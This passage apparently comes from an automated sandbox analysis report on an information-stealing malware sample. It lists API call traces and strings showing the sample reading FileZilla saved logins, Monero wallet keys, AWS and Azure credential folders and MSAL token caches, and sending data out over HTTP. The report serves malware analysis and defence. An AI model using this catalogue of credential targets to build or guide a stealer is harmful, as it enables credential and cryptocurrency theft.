                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009C0DB2), ref: 009B068E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                  • API String ID: 1942843190-555421843
                  • Opcode ID: 26c2f9d3d03ae70480ca0caed7690a34bedf5fc1f157af2dd91d20a6888adf68
                  • Instruction ID: 75a562f17810a13c2e3fae5162afe9ffd34af8f4b3a569998eb7b7e93a3ce934
                  • Opcode Fuzzy Hash: 26c2f9d3d03ae70480ca0caed7690a34bedf5fc1f157af2dd91d20a6888adf68
                  • Instruction Fuzzy Hash: 13D10C71D00208ABDB04EBF4DE96FEE777DAF94710F504518F102AB091EE74AA46CB66
                  APIs
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                    • Part of subcall function 009A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 009A4839
                    • Part of subcall function 009A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 009A4849
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009A59F8
                  • StrCmpCA.SHLWAPI(?,015EF828), ref: 009A5A13
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009A5B93
                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,015EF818,00000000,?,015EB338,00000000,?,009C1A1C), ref: 009A5E71
                  • lstrlen.KERNEL32(00000000), ref: 009A5E82
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 009A5E93
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009A5E9A
                  • lstrlen.KERNEL32(00000000), ref: 009A5EAF
                  • lstrlen.KERNEL32(00000000), ref: 009A5ED8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 009A5EF1
                  • lstrlen.KERNEL32(00000000,?,?), ref: 009A5F1B
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 009A5F2F
                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 009A5F4C
                  • InternetCloseHandle.WININET(00000000), ref: 009A5FB0
                  • InternetCloseHandle.WININET(00000000), ref: 009A5FBD
                  • HttpOpenRequestA.WININET(00000000,015EF6B8,?,015EEEA8,00000000,00000000,00400100,00000000), ref: 009A5BF8
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                  • InternetCloseHandle.WININET(00000000), ref: 009A5FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 874700897-2180234286
                  • Opcode ID: 377fe90d2592de7f3aced8bfeeed9903bf85876634931aff747cd63193a39f54
                  • Instruction ID: a4c0c84ecb389e0b6b72fc3b471b08baf86c33e273fff9ff7ac164ee32b72453
                  • Opcode Fuzzy Hash: 377fe90d2592de7f3aced8bfeeed9903bf85876634931aff747cd63193a39f54
                  • Instruction Fuzzy Hash: 45122B72820118BADB15EBA0DDA5FEEB37CBF94710F404199B10663491EF702A4ACF66
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009B8B60: GetSystemTime.KERNEL32(009C0E1A,015EB008,009C05AE,?,?,009A13F9,?,0000001A,009C0E1A,00000000,?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009B8B86
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009ACF83
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 009AD0C7
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009AD0CE
                  • lstrcat.KERNEL32(?,00000000), ref: 009AD208
                  • lstrcat.KERNEL32(?,009C1478), ref: 009AD217
                  • lstrcat.KERNEL32(?,00000000), ref: 009AD22A
                  • lstrcat.KERNEL32(?,009C147C), ref: 009AD239
                  • lstrcat.KERNEL32(?,00000000), ref: 009AD24C
                  • lstrcat.KERNEL32(?,009C1480), ref: 009AD25B
                  • lstrcat.KERNEL32(?,00000000), ref: 009AD26E
                  • lstrcat.KERNEL32(?,009C1484), ref: 009AD27D
                  • lstrcat.KERNEL32(?,00000000), ref: 009AD290
                  • lstrcat.KERNEL32(?,009C1488), ref: 009AD29F
                  • lstrcat.KERNEL32(?,00000000), ref: 009AD2B2
                  • lstrcat.KERNEL32(?,009C148C), ref: 009AD2C1
                  • lstrcat.KERNEL32(?,00000000), ref: 009AD2D4
                  • lstrcat.KERNEL32(?,009C1490), ref: 009AD2E3
                    • Part of subcall function 009BA820: lstrlen.KERNEL32(009A4F05,?,?,009A4F05,009C0DDE), ref: 009BA82B
                    • Part of subcall function 009BA820: lstrcpy.KERNEL32(009C0DDE,00000000), ref: 009BA885
                  • lstrlen.KERNEL32(?), ref: 009AD32A
                  • lstrlen.KERNEL32(?), ref: 009AD339
                    • Part of subcall function 009BAA70: StrCmpCA.SHLWAPI(015E9D18,009AA7A7,?,009AA7A7,015E9D18), ref: 009BAA8F
                  • DeleteFileA.KERNEL32(00000000), ref: 009AD3B4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                  • String ID:
                  • API String ID: 1956182324-0
                  • Opcode ID: 5821b000c648c4b65ed50ff4e900960dea34ebe8bb5698e73792c682e4c925f9
                  • Instruction ID: a1366cb444498ad83052928f9957d7269877099377e60f0e15222223202ffb9a
                  • Opcode Fuzzy Hash: 5821b000c648c4b65ed50ff4e900960dea34ebe8bb5698e73792c682e4c925f9
                  • Instruction Fuzzy Hash: EFE10A71910108ABDB18EBA0DE96FEE737DAF94711F104158F106B70A1DE35BE09CBA6
                  APIs
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                    • Part of subcall function 009A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 009A4839
                    • Part of subcall function 009A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 009A4849
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009A4915
                  • StrCmpCA.SHLWAPI(?,015EF828), ref: 009A493A
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009A4ABA
                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,009C0DDB,00000000,?,?,00000000,?,",00000000,?,015EF7E8), ref: 009A4DE8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 009A4E04
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 009A4E18
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 009A4E49
                  • InternetCloseHandle.WININET(00000000), ref: 009A4EAD
                  • InternetCloseHandle.WININET(00000000), ref: 009A4EC5
                  • HttpOpenRequestA.WININET(00000000,015EF6B8,?,015EEEA8,00000000,00000000,00400100,00000000), ref: 009A4B15
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                  • InternetCloseHandle.WININET(00000000), ref: 009A4ECF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 460715078-2180234286
                  • Opcode ID: cdcc9da5f8210f1c960865016fb61360dd18fe4fa161feddf4122219525181a6
                  • Instruction ID: 2826eaae7ec313549a67e0407c47fdba98c4bf56c51a4f12530cb6dbbe044442
                  • Opcode Fuzzy Hash: cdcc9da5f8210f1c960865016fb61360dd18fe4fa161feddf4122219525181a6
                  • Instruction Fuzzy Hash: 48120B72910218AADB15EB90DEA2FEEB338BF94710F504199B10677491EF702F49CF66
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,015EE288,00000000,?,009C144C,00000000,?,?), ref: 009ACA6C
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 009ACA89
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 009ACA95
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 009ACAA8
                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 009ACAD9
                  • StrStrA.SHLWAPI(?,015EE330,009C0B52), ref: 009ACAF7
                  • StrStrA.SHLWAPI(00000000,015EE2E8), ref: 009ACB1E
                  • StrStrA.SHLWAPI(?,015EE488,00000000,?,009C1458,00000000,?,00000000,00000000,?,015E9C58,00000000,?,009C1454,00000000,?), ref: 009ACCA2
                  • StrStrA.SHLWAPI(00000000,015EE648), ref: 009ACCB9
                    • Part of subcall function 009AC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 009AC871
                    • Part of subcall function 009AC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 009AC87C
                  • StrStrA.SHLWAPI(?,015EE648,00000000,?,009C145C,00000000,?,00000000,015E9CA8), ref: 009ACD5A
                  • StrStrA.SHLWAPI(00000000,015E9DF8), ref: 009ACD71
                    • Part of subcall function 009AC820: lstrcat.KERNEL32(?,009C0B46), ref: 009AC943
                    • Part of subcall function 009AC820: lstrcat.KERNEL32(?,009C0B47), ref: 009AC957
                    • Part of subcall function 009AC820: lstrcat.KERNEL32(?,009C0B4E), ref: 009AC978
                  • lstrlen.KERNEL32(00000000), ref: 009ACE44
                  • CloseHandle.KERNEL32(00000000), ref: 009ACE9C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                  • String ID:
                  • API String ID: 3744635739-3916222277
                  • Opcode ID: a004e8f72eeb323d373986262dcadc839a50546ff43e00258c8be063e09e25e5
                  • Instruction ID: 2187d6a506e92470ac96e79c36d77d4cb1d2c941c0101d6277cea309916600fc
                  • Opcode Fuzzy Hash: a004e8f72eeb323d373986262dcadc839a50546ff43e00258c8be063e09e25e5
                  • Instruction Fuzzy Hash: 5EE10B71D00108BBDB14EBA4DD92FEEB778AF94710F404159F106A7591EF307A4ACBA6
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  • RegOpenKeyExA.ADVAPI32(00000000,015EC210,00000000,00020019,00000000,009C05B6), ref: 009B83A4
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 009B8426
                  • wsprintfA.USER32 ref: 009B8459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 009B847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 009B848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 009B8499
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                  • String ID: - $%s\%s$?
                  • API String ID: 3246050789-3278919252
                  • Opcode ID: ce3afd5307460facc7e771ca5f15de4fef5def0526e59351fb897463e55e421f
                  • Instruction ID: 2542af22dffac5bdf6aa5830fb16fe03c2ba41e02fd2895903f8b43cb64f798b
                  • Opcode Fuzzy Hash: ce3afd5307460facc7e771ca5f15de4fef5def0526e59351fb897463e55e421f
                  • Instruction Fuzzy Hash: 8C8108B191011CABEB28DB50CD95FEAB7BCBF48710F008699E109A6180DF756F85CFA5
                  APIs
                    • Part of subcall function 009B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009B8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 009B4DB0
                  • lstrcat.KERNEL32(?,\.azure\), ref: 009B4DCD
                    • Part of subcall function 009B4910: wsprintfA.USER32 ref: 009B492C
                    • Part of subcall function 009B4910: FindFirstFileA.KERNEL32(?,?), ref: 009B4943
                  • lstrcat.KERNEL32(?,00000000), ref: 009B4E3C
                  • lstrcat.KERNEL32(?,\.aws\), ref: 009B4E59
                    • Part of subcall function 009B4910: StrCmpCA.SHLWAPI(?,009C0FDC), ref: 009B4971
                    • Part of subcall function 009B4910: StrCmpCA.SHLWAPI(?,009C0FE0), ref: 009B4987
                    • Part of subcall function 009B4910: FindNextFileA.KERNEL32(000000FF,?), ref: 009B4B7D
                    • Part of subcall function 009B4910: FindClose.KERNEL32(000000FF), ref: 009B4B92
                  • lstrcat.KERNEL32(?,00000000), ref: 009B4EC8
                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 009B4EE5
                    • Part of subcall function 009B4910: wsprintfA.USER32 ref: 009B49B0
                    • Part of subcall function 009B4910: StrCmpCA.SHLWAPI(?,009C08D2), ref: 009B49C5
                    • Part of subcall function 009B4910: wsprintfA.USER32 ref: 009B49E2
                    • Part of subcall function 009B4910: PathMatchSpecA.SHLWAPI(?,?), ref: 009B4A1E
                    • Part of subcall function 009B4910: lstrcat.KERNEL32(?,015EF678), ref: 009B4A4A
                    • Part of subcall function 009B4910: lstrcat.KERNEL32(?,009C0FF8), ref: 009B4A5C
                    • Part of subcall function 009B4910: lstrcat.KERNEL32(?,?), ref: 009B4A70
                    • Part of subcall function 009B4910: lstrcat.KERNEL32(?,009C0FFC), ref: 009B4A82
                    • Part of subcall function 009B4910: lstrcat.KERNEL32(?,?), ref: 009B4A96
                    • Part of subcall function 009B4910: CopyFileA.KERNEL32(?,?,00000001), ref: 009B4AAC
                    • Part of subcall function 009B4910: DeleteFileA.KERNEL32(?), ref: 009B4B31
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                  • API String ID: 949356159-974132213
                  • Opcode ID: a917d53f016b97e9345fef9a336354aaab36de6d4c81bacc5326a35543c8bc91
                  • Instruction ID: b4ff62d9d83ce934749b0629f71e23b681edc04ac713952e5f9d3e3cd1464633
                  • Opcode Fuzzy Hash: a917d53f016b97e9345fef9a336354aaab36de6d4c81bacc5326a35543c8bc91
                  • Instruction Fuzzy Hash: EA41747AD4020867DB10F760DD87FED733CABA5704F404558B585A60C2EEB4ABC98B93
                  APIs
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 009B906C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID: image/jpeg
                  • API String ID: 2244384528-3785015651
                  • Opcode ID: 2bfe84211569f1efce92c8ca73a53c783a3484225dd8562798587b37d6d3f81a
                  • Instruction ID: 9b217c49b39cb2216771bb4e3ebd819e8135f7a85db8da66c339d029d7559bd4
                  • Opcode Fuzzy Hash: 2bfe84211569f1efce92c8ca73a53c783a3484225dd8562798587b37d6d3f81a
                  • Instruction Fuzzy Hash: B671BB75D10208ABDB04EFE4DD89FEEB7BDAF88710F108508F615AB290DB34A945CB61
                  APIs
